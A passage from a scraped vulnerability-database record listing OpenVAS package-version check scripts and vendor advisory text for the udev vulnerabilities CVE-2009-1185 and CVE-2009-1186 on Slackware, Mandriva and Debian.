CVE-2009-1185\n\nThe udev packages in Slackware 12.0, 12.1, 12.2, and -current had an integer\noverflow which could result in a denial of service: CVE-2009-1186\n\nNote that udev is only used with 2.6 kernels, which are not used by default\nwith Slackware 10.2 and 11.0.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2009-111-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"udev\", ver:\"064-i486-4_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"udev\", ver:\"097-i486-11_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"udev\", ver:\"111-i486-6_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"udev\", ver:\"118-i486-4_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"udev\", ver:\"141-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:38:46", "description": "The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103-1.", "cvss3": {}, "published": "2009-12-10T00:00:00", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:103-1 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066367", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066367", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_103_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:103-1 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security vulnerabilities have been identified and fixed in udev.\n\nudev before 1.4.1 does not verify whether a NETLINK message originates\nfrom kernel space, which allows local users to gain privileges by\nsending a NETLINK message from user space (CVE-2009-1185).\n\nBuffer overflow in the util_path_encode function in\nudev/lib/libudev-util.c in udev before 1.4.1 allows local users to\ncause a denial of service (service outage) via vectors that trigger\na call with crafted arguments (CVE-2009-1186).\n\nThe updated packages have been patched to prevent this.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:103-1\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103-1.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66367\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:103-1 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id0\", rpm:\"libvolume_id0~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id0-devel\", rpm:\"libvolume_id0-devel~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-tools\", rpm:\"udev-tools~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0\", rpm:\"lib64volume_id0~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0-devel\", rpm:\"lib64volume_id0-devel~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:07", "description": "The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:103 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063916", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063916", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_103.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:103 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security vulnerabilities have been identified and fixed in udev.\n\nudev before 1.4.1 does not verify whether a NETLINK message originates\nfrom kernel space, which allows local users to gain privileges by\nsending a NETLINK message from user space (CVE-2009-1185).\n\nBuffer overflow in the util_path_encode function in\nudev/lib/libudev-util.c in udev before 1.4.1 allows local users to\ncause a denial of service (service outage) via vectors that trigger\na call with crafted arguments (CVE-2009-1186).\n\nThe updated packages have been patched to prevent this.\n\nAffected: 2008.1, 2009.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:103\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63916\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:103 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id0\", rpm:\"libvolume_id0~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id0-devel\", rpm:\"libvolume_id0-devel~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-tools\", rpm:\"udev-tools~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0\", rpm:\"lib64volume_id0~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0-devel\", rpm:\"lib64volume_id0-devel~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0-devel\", rpm:\"libudev0-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1-devel\", rpm:\"libvolume_id1-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64udev0\", rpm:\"lib64udev0~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64udev0-devel\", rpm:\"lib64udev0-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id1\", rpm:\"lib64volume_id1~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id1-devel\", rpm:\"lib64volume_id1-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:36", "description": "The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103-1.", "cvss3": {}, "published": "2009-12-10T00:00:00", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:103-1 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:66367", "href": "http://plugins.openvas.org/nasl.php?oid=66367", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_103_1.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:103-1 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security vulnerabilities have been identified and fixed in udev.\n\nudev before 1.4.1 does not verify whether a NETLINK message originates\nfrom kernel space, which allows local users to gain privileges by\nsending a NETLINK message from user space (CVE-2009-1185).\n\nBuffer overflow in the util_path_encode function in\nudev/lib/libudev-util.c in udev before 1.4.1 allows local users to\ncause a denial of service (service outage) via vectors that trigger\na call with crafted arguments (CVE-2009-1186).\n\nThe updated packages have been patched to prevent this.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:103-1\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103-1.\";\n\n \n\nif(description)\n{\n script_id(66367);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:103-1 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id0\", rpm:\"libvolume_id0~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id0-devel\", rpm:\"libvolume_id0-devel~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-tools\", rpm:\"udev-tools~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0\", rpm:\"lib64volume_id0~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0-devel\", rpm:\"lib64volume_id0-devel~114~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:55:59", "description": "The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:103 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:63916", "href": "http://plugins.openvas.org/nasl.php?oid=63916", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_103.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:103 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security vulnerabilities have been identified and fixed in udev.\n\nudev before 1.4.1 does not verify whether a NETLINK message originates\nfrom kernel space, which allows local users to gain privileges by\nsending a NETLINK message from user space (CVE-2009-1185).\n\nBuffer overflow in the util_path_encode function in\nudev/lib/libudev-util.c in udev before 1.4.1 allows local users to\ncause a denial of service (service outage) via vectors that trigger\na call with crafted arguments (CVE-2009-1186).\n\nThe updated packages have been patched to prevent this.\n\nAffected: 2008.1, 2009.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:103\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:103.\";\n\n \n\nif(description)\n{\n script_id(63916);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:103 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id0\", rpm:\"libvolume_id0~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id0-devel\", rpm:\"libvolume_id0-devel~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-tools\", rpm:\"udev-tools~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0\", rpm:\"lib64volume_id0~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id0-devel\", rpm:\"lib64volume_id0-devel~118~6.3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0-devel\", rpm:\"libudev0-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1-devel\", rpm:\"libvolume_id1-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64udev0\", rpm:\"lib64udev0~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64udev0-devel\", rpm:\"lib64udev0-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id1\", rpm:\"lib64volume_id1~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64volume_id1-devel\", rpm:\"lib64volume_id1-devel~128~2.2mnb2\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:33", "description": "The remote host is missing an update to udev\nannounced via advisory DSA 1772-1.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1772-1 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:63842", "href": "http://plugins.openvas.org/nasl.php?oid=63842", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1772_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1772-1 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Kramer discovered two vulnerabilities in udev, the /dev and\nhotplug management daemon.\n\nCVE-2009-1185\n\nudev does not check the origin of NETLINK messages, allowing local\nusers to gain root privileges.\n\nCVE-2009-1186\n\nudev suffers from a buffer overflow condition in path encoding,\npotentially allowing arbitrary code execution.\n\nFor the old stable distribution (etch), these problems have been fixed in\nversion 0.105-4etch1.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.125-7+lenny1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your udev package.\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory DSA 1772-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201772-1\";\n\n\nif(description)\n{\n script_id(63842);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1772-1 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"0.105-4etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"0.105-4etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"0.105-4etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"0.125-7+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = 